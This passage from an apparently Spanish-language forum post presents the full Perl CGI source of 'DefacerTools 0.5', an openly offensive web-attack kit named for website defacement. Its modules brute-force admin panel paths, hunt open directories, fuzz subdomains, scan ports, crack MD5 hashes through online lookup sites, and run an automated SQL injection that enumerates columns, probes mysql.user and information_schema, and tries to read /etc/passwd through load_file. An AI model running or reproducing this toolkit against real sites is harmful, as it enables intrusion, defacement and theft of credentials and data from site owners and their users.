soporten el mismo. Yo hice todas las pruebas con xampp y al parecer todo funciona bien.
Las funciones del programa son :
[+] HexConverter
[+] PanelFinder
[+] PathsFinder
[+] SQLi Scanner
[+] FuzzDNS
[+] FinderPass
[+] PortScanner
El código del programa (formateado con perltidy) es
defacertools.cgi
Using perl Syntax Highlighting
- #!"\xampp\perl\bin\perl.exe"
- #
- #DefacerTools 0.5
- #
- #(C) Doddy Hackman 2012
- #
- #
- use CGI;
- use LWP::UserAgent;
- use URI::Split qw(uri_split);
- use HTML::LinkExtor;
- use IO::Socket;
- @panels = (
- 'admin/admin.asp', 'admin/login.asp',
- 'admin/index.asp', 'admin/admin.aspx',
- 'admin/login.aspx', 'admin/index.aspx',
- 'admin/webmaster.asp', 'admin/webmaster.aspx',
- 'asp/admin/index.asp', 'asp/admin/index.aspx',
- 'asp/admin/admin.asp', 'asp/admin/admin.aspx',
- 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx',
- 'admin/', 'login.asp',
- 'login.aspx', 'admin.asp',
- 'admin.aspx', 'webmaster.aspx',
- 'webmaster.asp', 'login/index.asp',
- 'login/index.aspx', 'login/login.asp',
- 'login/login.aspx', 'login/admin.asp',
- 'login/admin.aspx', 'administracion/index.asp',
- 'administracion/index.aspx', 'administracion/login.asp',
- 'administracion/login.aspx', 'administracion/webmaster.asp',
- 'administracion/webmaster.aspx', 'administracion/admin.asp',
- 'administracion/admin.aspx', 'php/admin/',
- 'admin/admin.php', 'admin/index.php',
- 'admin/login.php', 'admin/system.php',
- 'admin/ingresar.php', 'admin/administrador.php',
- 'admin/default.php', 'administracion/',
- 'administracion/index.php', 'administracion/login.php',
- 'administracion/ingresar.php', 'administracion/admin.php',
- 'administration/', 'administration/index.php',
- 'administration/login.php', 'administrator/index.php',
- 'administrator/login.php', 'administrator/system.php',
- 'system/', 'system/login.php',
- 'admin.php', 'login.php',
- 'administrador.php', 'administration.php',
- 'administrator.php', 'admin1.html',
- 'admin1.php', 'admin2.php',
- 'admin2.html', 'yonetim.php',
- 'yonetim.html', 'yonetici.php',
- 'yonetici.html', 'adm/',
- 'admin/account.php', 'admin/account.html',
- 'admin/index.html', 'admin/login.html',
- 'admin/home.php', 'admin/controlpanel.html',
- 'admin/controlpanel.php', 'admin.html',
- 'admin/cp.php', 'admin/cp.html',
- 'cp.php', 'cp.html',
- 'administrator/', 'administrator/index.html',
- 'administrator/login.html', 'administrator/account.html',
- 'administrator/account.php', 'administrator.html',
- 'login.html', 'modelsearch/login.php',
- 'moderator.php', 'moderator.html',
- 'moderator/login.php', 'moderator/login.html',
- 'moderator/admin.php', 'moderator/admin.html',
- 'moderator/', 'account.php',
- 'account.html', 'controlpanel/',
- 'controlpanel.php', 'controlpanel.html',
- 'admincontrol.php', 'admincontrol.html',
- 'adminpanel.php', 'adminpanel.html',
- 'admin1.asp', 'admin2.asp',
- 'yonetim.asp', 'yonetici.asp',
- 'admin/account.asp', 'admin/home.asp',
- 'admin/controlpanel.asp', 'admin/cp.asp',
- 'cp.asp', 'administrator/index.asp',
- 'administrator/login.asp', 'administrator/account.asp',
- 'administrator.asp', 'modelsearch/login.asp',
- 'moderator.asp', 'moderator/login.asp',
- 'moderator/admin.asp', 'account.asp',
- 'controlpanel.asp', 'admincontrol.asp',
- 'adminpanel.asp', 'fileadmin/',
- 'fileadmin.php', 'fileadmin.asp',
- 'fileadmin.html', 'administration.html',
- 'sysadmin.php', 'sysadmin.html',
- 'phpmyadmin/', 'myadmin/',
- 'sysadmin.asp', 'sysadmin/',
- 'ur-admin.asp', 'ur-admin.php',
- 'ur-admin.html', 'ur-admin/',
- 'Server.php', 'Server.html',
- 'Server.asp', 'Server/',
- 'wp-admin/', 'administr8.php',
- 'administr8.html', 'administr8/',
- 'administr8.asp', 'webadmin/',
- 'webadmin.php', 'webadmin.asp',
- 'webadmin.html', 'administratie/',
- 'admins/', 'admins.php',
- 'admins.asp', 'admins.html',
- 'administrivia/', 'Database_Administration/',
- 'WebAdmin/', 'useradmin/',
- 'sysadmins/', 'admin1/',
- 'system-administration/', 'administrators/',
- 'pgadmin/', 'directadmin/',
- 'staradmin/', 'ServerAdministrator/',
- 'SysAdmin/', 'administer/',
- 'LiveUser_Admin/', 'sys-admin/',
- 'typo3/', 'panel/',
- 'cpanel/', 'cPanel/',
- 'cpanel_file/', 'platz_login/',
- 'rcLogin/', 'blogindex/',
- 'formslogin/', 'autologin/',
- 'support_login/', 'meta_login/',
- 'manuallogin/', 'simpleLogin/',
- 'loginflat/', 'utility_login/',
- 'showlogin/', 'memlogin/',
- 'members/', 'login-redirect/',
- 'sub-login/', 'wp-login/',
- 'login1/', 'dir-login/',
- 'login_db/', 'xlogin/',
- 'smblogin/', 'customer_login/',
- 'UserLogin/', 'login-us/',
- 'acct_login/', 'admin_area/',
- 'bigadmin/', 'project-admins/',
- 'phppgadmin/', 'pureadmin/',
- 'sql-admin/', 'radmind/',
- 'openvpnadmin/', 'wizmysqladmin/',
- 'vadmind/', 'ezsqliteadmin/',
- 'hpwebjetadmin/', 'newsadmin/',
- 'adminpro/', 'Lotus_Domino_Admin/',
- 'bbadmin/', 'vmailadmin/',
- 'Indy_admin/', 'ccp14admin/',
- 'irc-macadmin/', 'banneradmin/',
- 'sshadmin/', 'phpldapadmin/',
- 'macadmin/', 'administratoraccounts/',
- 'admin4_account/', 'admin4_colon/',
- 'radmind-1/', 'Super-Admin/',
- 'AdminTools/', 'cmsadmin/',
- 'SysAdmin2/', 'globes_admin/',
- 'cadmins/', 'phpSQLiteAdmin/',
- 'navSiteAdmin/', 'server_admin_small/',
- 'logo_sysadmin/', 'server/',
- 'database_administration/', 'power_user/',
- 'system_administration/', 'ss_vms_admin_sm/'
- );
- my @dns = ('www');
- #my @dns = #('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business',
- #'chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail',
- #'e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1',
- #'firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https',
- #'hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus',
- #'lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist',
- #'mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup',
- #'newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost',
- #'popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read',
- #'redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp',
- #'smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend',
- #'trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file',
- #'fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access',
- #'dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts',
- #'test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple',
- #'hp-ux','bigip','pc');
- my $nave = LWP::UserAgent->new;
- $nave->agent(
- "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
- );
- $nave->timeout(5);
- my %rta;
- my $que = new CGI;
- my @ques = $que->param;
- for (@ques) {
- $rta{$_} = $que->param($_);
- }
- print "Content-type:text/html\n\n";
- print "
- <style type=text/css>
- .main {
- margin : -287px 0px 0px -490px;
- border : White solid 1px;
- BORDER-COLOR: #00FF00;
- }
- #pie {
- position: absolute;
- bottom: 0;
- }
- body,a:link {
- font: normal 16px Verdana, Arial, Helvetica,
- sans-serif;
- background-color: #000000;
- color:#00FF00;
- Courier New;
- cursor:crosshair;
- font-size: small;
- }
- input,table.outset,table.bord,table,textarea,select {
- background-color:black;color:#00FF00;
- border: solid 1px #00FF00;
- border-color:#00FF00
- }
- a:link,a:visited,a:active {
- color: #00FF00;
- font: normal 16px Verdana, Arial, Helvetica,
- sans-serif;
- text-decoration: none;
- }
- </style>";
- if ( $rta{'hex'} ) {
- logouno();
- print
- qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
- copyright();
- }
- elsif ( $rta{'textocode'} ) {
- logouno();
- print "[+] Encode : <b>" . encode( $rta{'textocode'} ) . "</b><br><br>";
- print "</center>";
- copyright();
- }
- elsif ( $rta{'panelfinder'} ) {
- logodos();
- print
- qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
- copyright();
- }
- elsif ( $rta{'buscarpanel'} ) {
- my $page = $rta{'buscarpanel'};
- logodos();
- print "<br>[+] Scanning $page<br><br>";
- for $path (@panels) {
- $code = tomax( $page . "/" . $path );
- if ( $code->is_success ) {
- print "[Link] : " . $page . "/" . $path . "<br>";
- }
- }
- print "<br><br>[+] Finish<br>";
- copyright();
- }
- elsif ( $rta{'pathsfinder'} ) {
- logotres();
- print
- qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
- copyright();
- }
- elsif ( $rta{'buscarpaths'} ) {
- logotres();
- my $page = $rta{'buscarpaths'};
- my $code = toma($page);
- my @links = get_links($code);
- print "<br><br>[+] Finding paths<br><br>";
- for my $com (@links) {
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
- if ( $path =~ /\/(.*)$/ ) {
- my $path1 = $1;
- $page =~ s/$path1//ig;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
- if ( $path =~ /(.*)\// ) {
- my $parche = $1;
- unless ( $repetidos =~ /$parche/ ) {
- $repetidos .= " " . $parche;
- my $code = toma( "http://" . $auth . $parche );
- if ( $code =~ /Index of (.*)</ig ) {
- my $dir_found = $1;
- chomp $dir_found;
- print "[+] Directory Found : $page/$dir_found<br>";
- }
- }
- }
- }
- }
- print "<br><br>[+]Finished<br>";
- copyright();
- }
- elsif ( $rta{'sqliscanner'} ) {
- logocuatro();
- print
- qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
- copyright();
- }
- elsif ( $rta{'buscarsql'} ) {
- logocuatro();
- print "<br><br>[+] Scanning page<br><br>";
- &length( $rta{'buscarsql'} );
- print "<br><br>[+] Finished";
- copyright();
- }
- elsif ( $rta{'fuzzdns'} ) {
- logocinco();
- print
- qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
- copyright();
- }
- elsif ( $rta{'buscardns'} ) {
- logocinco();
- my $page = $rta{'buscardns'};
- print "<br><br>[+] Searching DNS to " . $page . ".....<br><br><br>";
- for my $path (@dns) {
- $code = tomax( "http://" . $path . "." . $page );
- if ( $code->is_success ) {
- print "[+] Found : http://" . $path . "." . $page . "<br>";
- }
- }
- print "<br><br>[+] Finished<br><br>";
- copyright();
- }
- elsif ( $rta{'finderpass'} ) {
- logoseis();
- print
- qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
- copyright();
- }
- elsif ( $rta{'buscarhash'} ) {
- logoseis();
- &crackit( $rta{'buscarhash'} );
- copyright();
- }
- elsif ( $rta{'portscanner'} ) {
- logosiete();
- print
- qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
- copyright();
- }
- elsif ( $rta{'buscarpuertos'} ) {
- logosiete();
- scanuno( $rta{'buscarpuertos'} );
- copyright();
- }
- elsif ( $rta{'home'} ) {
- sintax();
- }
- else {
- sintax();
- }
- sub sintax {
- print qq(
- <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title>
- <br><br>
- <h1><center>DefacerTools</center></h1>
- <br><br>
- <center>
- <table border=1>
- <td class=main><center><b>Tools</b></center></td><tr>
- <td class=main><a href=?hex=true><center>HexConverter</center></a></td><tr>
- <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr>
- <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr>
- <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr>
- <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr>
- <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr>
- <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td>
- </table>
- </center>
- );
- }
- sub logouno {
- print qq(
- <center>
- <pre>
- @ @ @@@@
- @ @ @ @ @
- @ @ @ @
- @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@
- @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @
- @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @
- @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @
- </pre>
- );
- }
- sub logodos {
- print qq(
- <center>
- <pre>
- @@@@@ @ @@@@@ @ @
- @ @ @ @ @
- @ @ @ @ @
- @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@
- @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
- @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @
- </pre>
- );
- }
- sub logotres {
- print qq(
- <center>
- <pre>
- @@@@@ @ @@@@@ @ @
- @ @ @ @ @ @
- @ @ @ @ @ @
- @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@
- @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @
- @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @
- </pre>
- );
- }
- sub logocuatro {
- print qq(
- <center>
- <pre>
- @@@ @@@@ @ @ @@@
- @ @ @ @ @ @ @ @
- @ @ @ @ @ @
- @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@
- @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
- @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
- @
- </pre>
- );
- }
- sub logocinco {
- print qq(
- <center>
- <pre>
- @@@@@ @@@@ @ @ @@@
- @ @ @ @@ @ @ @
- @ @ @ @@ @ @
- @ @ @ @@@@ @@@@ @ @ @ @ @ @
- @@@@ @ @ @ @ @ @ @ @ @ @@@
- @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @@ @
- @ @ @@ @ @ @ @ @ @@ @ @
- @ @@ @ @@@@ @@@@ @@@@ @ @ @@@
- </pre>
- );
- }
- sub logoseis {
- print qq(
- <center>
- <pre>
- @@@@@ @ @ @@@@@
- @ @ @ @
- @ @ @ @
- @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@
- @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @
- @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@
- </pre>
- );
- }
- sub logosiete {
- print qq(
- <center>
- <pre>
- @@@@@ @@@
- @ @ @ @ @
- @ @ @ @
- @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@
- @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @
- @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
- @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @
- </pre>
- );
- }
- sub copyright {
- print
- qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
- }
- sub length {
- print "<br>[+] Looking for the number of columns<br><br>";
- my $rows = "0";
- my $asc;
- my $page = $_[0];
- ( $pass1, $pass2 ) = &bypass( $_[1] );
- $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
- $total = "1";
- for my $rows ( 2 .. 200 ) {
- $asc .=
- "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
- $total .= "," . $rows;
- $injection =
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $alert
- . $asc;
- $test = toma($injection);
- if ( $test =~ /RATSXPDOWN/ ) {
- @number = $test =~ m{RATSXPDOWN(\d+)RATSXPDOWN}g;
- $control = 1;
- my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
- my $save = $auth;
- $total =~ s/$number[0]/hackman/;
- print "[SQLI] : "
- . $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total . "<br>";
- details(
- $page . "1"
- . $pass1 . "and"
- . $pass1 . "1=0"
- . $pass1 . "union"
- . $pass1
- . "select"
- . $pass1
- . $total,
- "--", ""
- );
- }
- }
- }
- sub details {
- my ( $page, $bypass, $save ) = @_;
- ( $pass1, $pass2 ) = &bypass($bypass);
- if ( $page =~ /(.*)hackman(.*)/ig ) {
- print "<br>[+] Searching information..<br><br>";
- my ( $start, $end ) = ( $1, $2 );
- $inforschema =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "information_schema.tables"
- . $pass2;
- $mysqluser =
- $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))"
- . $end
- . $pass1 . "from"
- . $pass1
- . "mysql.user"
- . $pass2;
- $test3 =
- toma( $start
- . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))"
- . $end
- . $pass2 );
- $test1 = toma($inforschema);
- $test2 = toma($mysqluser);
- if ( $test2 =~ /ERTOR854/ig ) {
- print "[mysql.user] : ON<br>";
- }
- else {
- print "[mysql.user] : OFF<br>";
- }
- if ( $test1 =~ /ERTOR854/ig ) {
- print "[information_schema.tables] : ON<br>";
- }
- else {
- print "[information_schema.tables] : OFF<br>";
- }
- if ( $test3 =~ /ERTOR854/ig ) {
- print "[load_file] : ON<br>";
- }
- $concat =
- "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
- $injection = $start . $concat . $end . $pass2;
- $code = toma($injection);
- if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
- print
- "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
- }
- else {
- print "<br>[-] Not found any data<br>";
- }
- }
- }
- sub encode {
- my $string = $_[0];
- $hex = '0x';
- for ( split //, $string ) {
- $hex .= sprintf "%x", ord;
- }
- return $hex;
- }
- sub bypass {
- if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); }
- elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); }
- else { return ( "+", "--" ); }
- }
- sub ascii {
- return join ',', unpack "U*", $_[0];
- }
- sub toma {
- return $nave->get( $_[0] )->content;
- }
- sub tomax {
- return $nave->get( $_[0] );
- }
- sub get_links {
- $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
- return @links;
- sub agarrar {
- my ( $a, %b ) = @_;
- push( @links, values %b );
- }
- }
- sub crackit {
- my $secret = $_[0];
- print "<br><br>[+] Cracking $_[0]<br><br>";
- my %hash = (
- 'http://passcracking.com/' => {
- 'tipo' => 'post',
- 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
- 'regex' =>
- '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
- },
- 'http://md5.hashcracking.com/search.php?md5=' => {
- 'tipo' => 'get',
- 'regex' => 'Cleartext of $_[0] is (.*)',
- },
- 'http://www.bigtrapeze.com/md5/' => {
- 'tipo' => 'post',
- 'variables' => '{"query" => $_[0], "submit" => " Crack "}',
- 'regex' =>
- 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
- },
- 'http://opencrack.hashkiller.com/' => {
- 'tipo' => 'post',
- 'variables' =>
- '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
- 'regex' => qq(<\/div><div class="result">$_[0]:(.+)<br\/>),
- },
- 'http://www.hashchecker.com/index.php?_sls=search_hash' => {
- 'tipo' => 'post',
- 'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
- 'regex' =>
- '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
- },
- 'http://victorov.su/md5/?md5e=&md5d=' => {
- 'tipo' => 'get',
- 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">),
- }
- );
- for my $data ( keys %hash ) {
- if ( $hash{$data}{tipo} eq "get" ) {
- $code = toma( $data . $_[0] );
- if ( $code =~ /$hash{$data}{regex}/ig ) {
- print "<br>[+] Decoded : " . $1 . "<br><br>";
- print $secret. ":" . $1 . "<br>";
- }
- }
- else {
- $code = tomar( $data, $hash{$data}{variables} );
- if ( $code =~ /$hash{$data}{regex}/ig ) {
- print $secret. ":" . $1 . "<br>";
- }
- }
- }
- print "<br>[+] Finish<br>";
- }
- sub tomar {
- my ( $web, $var ) = @_;
- return $nave->post( $web, [ %{$var} ] )->content;
- }
- sub scanuno {
- my %ports = (
- "21" => "ftp",
- "22" => "ssh",
- "25" => "smtp",
- "80" => "http",
- "110" => "pop3",
- "3306" => "mysql"
- );
- print "<br>[+] Scanning $_[0]<br><br><br>";
- for my $port ( keys %ports ) {
- if (
- new IO::Socket::INET(
- PeerAddr => $_[0],
- PeerPort => $port,
- Proto => "tcp",
- Timeout => 0.5
- )
- )
- {
- print "[Port] : "
- . $port
- . " [Service] : "
- . $ports{$port} . "<br>";
- }
- }
- print "<br><br>[+] Scan Finish<br>";
- }
- # The End ?
Coloreado en 0.020 segundos, usando GeSHi 1.0.8.4